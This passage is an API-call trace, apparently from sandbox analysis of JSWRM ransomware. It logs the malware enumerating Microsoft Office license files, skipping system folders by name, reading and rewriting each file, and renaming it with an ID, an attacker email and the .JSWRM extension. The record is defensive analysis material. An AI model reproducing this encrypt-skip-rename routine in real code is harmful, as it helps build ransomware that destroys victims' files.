lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0106.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0106.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0106.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.496] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7b2b6c6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7b2b6c6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7bc4076, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_MAK-ul-oob.xrm-ms", cAlternateFileName="ON58ED~1.XRM")) returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.496] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0106.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.497] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0106.497] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.497] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.593] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.593] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.593] CloseHandle (hObject=0x45c) returned 1 [0106.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0106.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0106.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0106.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0106.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0106.598] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7b054c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7b054c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7d1b583, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_MAK-ul-phn.xrm-ms", cAlternateFileName="OND9C3~1.XRM")) returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.598] lstrcmpiW (lpString1="OneNoteVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0106.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0106.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0106.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0106.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0106.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413d0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0106.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0106.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.599] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19931) returned 1 [0106.599] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0106.599] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.602] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.602] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.602] CloseHandle (hObject=0x45c) returned 1 [0106.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0106.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0106.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0106.604] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a206b8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7a206b8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7b054c5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5128, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Grace-ppd.xrm-ms", cAlternateFileName="OUTLOO~1.XRM")) returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.604] lstrcmpiW (lpString1="OutlookR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0106.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.605] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20776) returned 1 [0106.605] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0106.605] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0106.609] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.609] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0106.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: 